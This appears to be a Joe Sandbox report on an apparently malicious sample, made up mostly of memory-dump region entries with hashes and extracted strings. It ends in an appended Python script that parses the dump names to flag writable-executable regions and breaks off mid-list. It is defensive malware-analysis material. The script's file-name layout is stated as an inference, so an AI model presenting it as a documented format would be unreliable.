                                                              • Instruction ID: 369ad979f0576268b59254f46f3fda5d62301c0efc06f99d0b0c10a850aa2688
                                                              • Opcode Fuzzy Hash: a39acb1d62a334b9f298ccf10cf48731bdf72c7b58e510a389ac9696c16e2641
                                                              • Instruction Fuzzy Hash: C0E242B1A083A18FD728DF29C08075EFBE0BB88744F15891DE99597361E775E864CF82
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1413108358.0000000000D91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                              Similarity
                                                              • API ID:
                                                              • String ID: .12$M 0.$NT L
                                                              • API String ID: 0-1919902838
                                                              • Opcode ID: 80e8581c01d50957e099e1fc88bfa0c229942725344a9cff382d546a14105f69
                                                              • Instruction ID: 00c5078a1023fb8a3615b5183445b84bd7b78003f7f2546242da87bfe2ed1505
                                                              • Opcode Fuzzy Hash: 80e8581c01d50957e099e1fc88bfa0c229942725344a9cff382d546a14105f69
                                                              • Instruction Fuzzy Hash: 8251D4B46003459BDB119F24C884BAA77F4FF48308F19C569ED4C9F252D375DA84CBA6
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1413108358.0000000000D91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                              Similarity
                                                              • API ID:
                                                              • String ID: -----END PUBLIC KEY-----$-----BEGIN PUBLIC KEY-----$vtls/vtls.c
                                                              • API String ID: 0-424504254
                                                              • Opcode ID: e5c8b7a19f58b607f531ee8ea1a524ea8d35b90dba1c90aaf718ffc2f60bc2a8
                                                              • Instruction ID: 60b51eebdc55fae88b77fadb8fd2aaf24fba951c150b25e97490609e19999c4d
                                                              • Opcode Fuzzy Hash: e5c8b7a19f58b607f531ee8ea1a524ea8d35b90dba1c90aaf718ffc2f60bc2a8
                                                              • Instruction Fuzzy Hash: 483147A2A08751DBD7291D3D9C81AB57A869FA1318F5C473CF4C797296F669CC00C3B1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1413108358.0000000000D91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                              Similarity
                                                              • API ID:
                                                              • String ID: #$4
                                                              • API String ID: 0-353776824
                                                              • Opcode ID: 86843d0470a618780ed6602d273fb8ee4c232ace87045b085d2f2e4fe835813c
                                                              • Instruction ID: b0c7792debcb77045c536df263340336589d3e029336dddf02c0c6a683101a15
                                                              • Opcode Fuzzy Hash: 86843d0470a618780ed6602d273fb8ee4c232ace87045b085d2f2e4fe835813c
                                                              • Instruction Fuzzy Hash: 7D22C7359087418FD31ADF2CC4806AAF7E4FF84318F058B2DE99997391D7B4A885CB96
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1413108358.0000000000D91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                              Similarity
                                                              • API ID:
                                                              • String ID: #$4
                                                              • API String ID: 0-353776824
                                                              • Opcode ID: aa3d81908d3ecfc74d4f23fb4c6d5a0f05227800a08e888fb616fbf31a5ebd1e
                                                              • Instruction ID: 7d86fe67ffd7657ce9b8f19c960ff64f77afb85c48bd292c94a01e4dbd18291b
                                                              • Opcode Fuzzy Hash: aa3d81908d3ecfc74d4f23fb4c6d5a0f05227800a08e888fb616fbf31a5ebd1e
                                                              • Instruction Fuzzy Hash: 3012C332A087118BC72ACF18C4847ABB7E5FFC4318F198A7DE99957391D7B49884CB52
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1413108358.0000000000D91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                              Similarity
                                                              • API ID:
                                                              • String ID: H$xn--
                                                              • API String ID: 0-4022323365
                                                              • Opcode ID: 35c4361637fe97157a5e3cc66b47b057ee7ac6ebc25a40bc3001ce01c2ad4d97
                                                              • Instruction ID: 9d199145398e26ceb26b28bd953a76c5f8d5095ff742356ea0ada6af0394348a
                                                              • Opcode Fuzzy Hash: 35c4361637fe97157a5e3cc66b47b057ee7ac6ebc25a40bc3001ce01c2ad4d97
                                                              • Instruction Fuzzy Hash: 9FE157726087158BDB1CDE2CD8D072EF7D2ABC4B20F198A3DD99687789E77098058746
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1413108358.0000000000D91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Downgrades to HTTP/1.1$multi.c
                                                              • API String ID: 0-3089350377
                                                              • Opcode ID: 1f1eb404363a178c532be67c63df796a41fcd0cb609380d0b16bfd8fbe188b14
                                                              • Instruction ID: 51db045e3a2cd9f500346a29048a73b2c3f10dbaf75a00a85f35579373c7b654
                                                              • Opcode Fuzzy Hash: 1f1eb404363a178c532be67c63df796a41fcd0cb609380d0b16bfd8fbe188b14
                                                              • Instruction Fuzzy Hash: 13C11779A08301ABD714DF24D88176AB7E1FF96314F08852DF48997292E770E958CBB2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1413108358.0000000000D91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                              Similarity
                                                              • API ID:
                                                              • String ID: BQ`
                                                              • API String ID: 0-1649249777
                                                              • Opcode ID: 68477ae567d17304ebf9d775184948612aeb2875652f681b04b8786e7ca399ff
                                                              • Instruction ID: 58c81d6998b37450ba64ac0ade67250444792a48450678b804cfec1554ac8a5a
                                                              • Opcode Fuzzy Hash: 68477ae567d17304ebf9d775184948612aeb2875652f681b04b8786e7ca399ff
                                                              • Instruction Fuzzy Hash: 9EA2BC756083558FCB18CF19D8946ADBBE2FF98314F188A6EE9D98B341D730E940CB91
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1413108358.0000000000D91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                              • Associated: 00000000.00000002.1413085142.0000000000D90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1413108358.0000000001301000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1413108358.0000000001467000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1413108358.0000000001469000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414057526.000000000146C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.000000000146E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.000000000170A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.000000000170D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.00000000017ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.00000000017F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.0000000001805000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414465145.0000000001806000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414688021.00000000019C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414707318.00000000019C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_d90000_5KwhHEdmM4.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: D
                                                              • API String ID: 0-2746444292
                                                              • Opcode ID: e2b941407947bc7e14958a579725416c28e54f29a52ea05c8b83999412471686
                                                              • Instruction ID: a2291e5d9c7bd6fc0fb0bc3ad919015d60a7b6c8cc5ae1931f7263814ece5a92
                                                              • Opcode Fuzzy Hash: e2b941407947bc7e14958a579725416c28e54f29a52ea05c8b83999412471686
                                                              • Instruction Fuzzy Hash: 48327C7290C3418BD725DF28D4806AEF7E1BFC9304F198A6EEAD953351D730A945CB82
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1413108358.0000000000D91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                              • Associated: 00000000.00000002.1413085142.0000000000D90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1413108358.0000000001301000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1413108358.0000000001467000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1413108358.0000000001469000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414057526.000000000146C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.000000000146E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.000000000170A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.000000000170D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.00000000017ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.00000000017F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.0000000001805000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414465145.0000000001806000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414688021.00000000019C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414707318.00000000019C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_d90000_5KwhHEdmM4.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: H
                                                              • API String ID: 0-2852464175
                                                              • Opcode ID: 1281377b405c0dc38d01eef89cd8e034a28f4da2052d324015ae81e99efa89f5
                                                              • Instruction ID: 613ca8dd713ac50327c1e92df6f0f0a5f1b9198bd5e374bd90b157396c087f2b
                                                              • Opcode Fuzzy Hash: 1281377b405c0dc38d01eef89cd8e034a28f4da2052d324015ae81e99efa89f5
                                                              • Instruction Fuzzy Hash: AB91B4317483218FCB19CE1CD49016FB7E3AFC9354F1A953DD996A7391DA31AC468B81
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1413108358.0000000000D91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                              • Associated: 00000000.00000002.1413085142.0000000000D90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1413108358.0000000001301000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1413108358.0000000001467000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1413108358.0000000001469000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414057526.000000000146C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.000000000146E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.000000000170A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.000000000170D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.00000000017ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.00000000017F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.0000000001805000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414465145.0000000001806000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414688021.00000000019C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414707318.00000000019C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_d90000_5KwhHEdmM4.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: curl
                                                              • API String ID: 0-65018701
                                                              • Opcode ID: 9213e77848f6ed6a2c48ba47da20f0455c586281cd2fb3360655394b213c8df5
                                                              • Instruction ID: 899cc96d2a3ed4091c36d5737de9f8ad0f2c14cce50d5b45d93f6c9f672fd7d7
                                                              • Opcode Fuzzy Hash: 9213e77848f6ed6a2c48ba47da20f0455c586281cd2fb3360655394b213c8df5
                                                              • Instruction Fuzzy Hash: 736186B18147459BD721DF24D880BDBB3E8BF99304F44962DED489B212F731E698C752
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1413108358.0000000000D91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                              • Associated: 00000000.00000002.1413085142.0000000000D90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1413108358.0000000001301000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1413108358.0000000001467000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1413108358.0000000001469000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414057526.000000000146C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.000000000146E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.000000000170A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.000000000170D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.00000000017ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.00000000017F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.0000000001805000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414465145.0000000001806000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414688021.00000000019C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414707318.00000000019C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_d90000_5KwhHEdmM4.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d9e1dffb9c167f2a1bfd412aa57ca9546c7a865265bd6293c312d3add4af8ce4
                                                              • Instruction ID: 1d988395fac74fed1c0575ccbf953c53041e74c3420b7758784f5875ffc1b5b4
                                                              • Opcode Fuzzy Hash: d9e1dffb9c167f2a1bfd412aa57ca9546c7a865265bd6293c312d3add4af8ce4
                                                              • Instruction Fuzzy Hash: AC2264735417044BE318CF2FCC81582B3E3AFD822475F857EC926CB696EEB9A61B4548
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1413108358.0000000000D91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                              • Associated: 00000000.00000002.1413085142.0000000000D90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1413108358.0000000001301000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1413108358.0000000001467000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1413108358.0000000001469000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414057526.000000000146C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.000000000146E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.000000000170A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.000000000170D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.00000000017ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.00000000017F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.0000000001805000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414465145.0000000001806000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414688021.00000000019C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414707318.00000000019C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_d90000_5KwhHEdmM4.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 722f239b897cac5e1a4d8c430c26ccd9f9d97e6cc300e6e940f125c6d523148c
                                                              • Instruction ID: 1eddb86e742056c49d5b1cd4f8bfcd2cb8165dd7c3ef7f40df4c974dd4fe218f
                                                              • Opcode Fuzzy Hash: 722f239b897cac5e1a4d8c430c26ccd9f9d97e6cc300e6e940f125c6d523148c
                                                              • Instruction Fuzzy Hash: 1712C776F483154FC30CDD6DC992359FAD75BC8310F1A893EA959DB3A0EAB9EC014681
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1413108358.0000000000D91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                              • Associated: 00000000.00000002.1413085142.0000000000D90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1413108358.0000000001301000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1413108358.0000000001467000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1413108358.0000000001469000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414057526.000000000146C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.000000000146E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.000000000170A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.000000000170D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.00000000017ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.00000000017F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.0000000001805000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414465145.0000000001806000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414688021.00000000019C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414707318.00000000019C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_d90000_5KwhHEdmM4.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3eb5461328efb87861e9783b3581e7f2d97aa883510f9df698f5ad02820d1331
                                                              • Instruction ID: aed6eacc40b0d3e1b76abcabcbb9f378fa09ca89ea130d45577a8787e2bf5b0e
                                                              • Opcode Fuzzy Hash: 3eb5461328efb87861e9783b3581e7f2d97aa883510f9df698f5ad02820d1331
                                                              • Instruction Fuzzy Hash: 25121D37B515198FEB44DEA5D8483DBB3A2FF9C318F6A9534CD48AB607C635B502CA80
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000003.1396390442.0000000001C56000.00000004.00000020.00020000.00000000.sdmp, Offset: 01C56000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_3_1c56000_5KwhHEdmM4.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: fd3d464e183b5effee218988c84cef73ef46af115c947443d29632b3ee2075b6
                                                              • Instruction ID: f86d5e1017e0d2d1791308230963ea4441b543543b6d45ab2d3bcbb6eadf70cf
                                                              • Opcode Fuzzy Hash: fd3d464e183b5effee218988c84cef73ef46af115c947443d29632b3ee2075b6
                                                              • Instruction Fuzzy Hash: 7DB11F6644E3C28FD71787344CB95A0BFB46E1312470E95CFC8C98F5A3E248994AD763
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1413108358.0000000000D91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                              • Associated: 00000000.00000002.1413085142.0000000000D90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1413108358.0000000001301000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1413108358.0000000001467000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1413108358.0000000001469000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414057526.000000000146C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.000000000146E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.000000000170A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.000000000170D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.00000000017ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.00000000017F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.0000000001805000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414465145.0000000001806000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414688021.00000000019C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414707318.00000000019C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_d90000_5KwhHEdmM4.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7a25351e3220810489f583a3e3660280851945a754fa0ce21727f4e01adf4ee7
                                                              • Instruction ID: 4d67cf7aacde749ae7ad3778e41c50320da2a7a4eea89b5e170d931e3ccb6481
                                                              • Opcode Fuzzy Hash: 7a25351e3220810489f583a3e3660280851945a754fa0ce21727f4e01adf4ee7
                                                              • Instruction Fuzzy Hash: 62E137309183158FDB24CF18C44036ABBE3BF96390F68852DE4D98B395D738DD869BA1
Memory Dump Source
• Source File: 00000000.00000002.1413108358.0000000000D91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
• Associated: 00000000.00000002.1413085142.0000000000D90000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1413108358.0000000001301000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1413108358.0000000001467000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1413108358.0000000001469000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1414057526.000000000146C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1414076607.000000000146E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1414076607.00000000015F6000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1414076607.000000000170A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1414076607.000000000170D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1414076607.00000000017ED000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1414076607.00000000017F7000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1414076607.0000000001805000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1414465145.0000000001806000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1414688021.00000000019C0000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1414707318.00000000019C2000.00000080.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_d90000_5KwhHEdmM4.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 594b8816a3e66e4172325feff1adfa33aadc9464a8ccd7627c7ed4199f9277a4
• Instruction ID: 99cd07d00a04a664231108a86e926c2afefc04a92af33fd43b5e27c5c434b37c
• Opcode Fuzzy Hash: 594b8816a3e66e4172325feff1adfa33aadc9464a8ccd7627c7ed4199f9277a4
• Instruction Fuzzy Hash: 3FC18D75604B018FD324CF2AC484A6ABBE2FF85314F148A6DE5EAC7791E734E849CB51
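The dump names above encode where each region sat in the process and how it was protected. The following Python is an added example, not part of the Joe Sandbox report or its tooling: it decodes the names listed for this sample and flags image regions that were both writable and executable, which is what the "changes PE section rights" unpacking signature in the overview refers to. The dotted field layout (process.run.stamp.address.protect.field5.type.field7) is an assumption inferred from the names themselves, not documented; only the address, protection and type fields are interpreted, using the documented Windows PAGE_* and MEM_IMAGE constants. The sample list and the image base 0x00D90000 are copied from the record above.

```python
import re
from dataclasses import dataclass

# Windows page-protection constants (winnt.h, documented values).
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
# Protections that are writable AND executable: what in-place unpacking needs.
WX_PROTECT = {0x40, 0x80}
# Region types from MEMORY_BASIC_INFORMATION.Type (documented values).
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

# ASSUMPTION: the .sdmp name layout is inferred from the report's own names,
#   <proc>.<run>.<stamp>.<address>.<protect>.<field5>.<type>.<field7>.sdmp
# field5 and field7 are captured but deliberately not interpreted.
SDMP_RE = re.compile(
    r"^(?P<proc>[0-9a-f]{8})\.(?P<run>[0-9a-f]{8})\.(?P<stamp>\d+)\."
    r"(?P<address>[0-9a-f]{16})\.(?P<protect>[0-9a-f]{8})\.(?P<field5>[0-9a-f]{8})\."
    r"(?P<type>[0-9a-f]{8})\.(?P<field7>[0-9a-f]{8})\.sdmp$",
    re.IGNORECASE,
)


@dataclass(frozen=True)
class DumpRegion:
    address: int
    protect: int
    mem_type: int

    @property
    def protect_name(self) -> str:
        # Mask off modifiers such as PAGE_GUARD (0x100) before the lookup.
        return PAGE_PROTECT.get(self.protect & 0xFF, f"0x{self.protect:08x}")

    @property
    def type_name(self) -> str:
        return MEM_TYPE.get(self.mem_type, f"0x{self.mem_type:08x}")

    @property
    def writable_executable(self) -> bool:
        return (self.protect & 0xFF) in WX_PROTECT


def parse_sdmp(name: str) -> DumpRegion:
    """Parse one .sdmp file name; raises ValueError if it does not fit the assumed layout."""
    m = SDMP_RE.match(name.strip())
    if not m:
        raise ValueError(f"not a recognised sdmp name: {name!r}")
    return DumpRegion(address=int(m["address"], 16),
                      protect=int(m["protect"], 16),
                      mem_type=int(m["type"], 16))


def rva(region: DumpRegion, image_base: int) -> int:
    """Offset of a dumped region from the PE image base the report gives ("Offset")."""
    return region.address - image_base


def wx_image_regions(names, image_base: int):
    """(rva, protection) for every dump that is writable+executable inside an image
    mapping: PE sections whose rights were changed after load."""
    hits = []
    for name in names:
        r = parse_sdmp(name)
        if r.writable_executable and r.type_name == "MEM_IMAGE":
            hits.append((rva(r, image_base), r.protect_name))
    return sorted(hits)


# Sample input copied from the record above (image base from "Offset: 00D90000").
IMAGE_BASE = 0x00D90000
SAMPLE_DUMPS = [
    "00000000.00000002.1413108358.0000000000D91000.00000040.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1413085142.0000000000D90000.00000004.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1413108358.0000000001301000.00000040.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1413108358.0000000001467000.00000040.00000001.01000000.00000003.sdmp",
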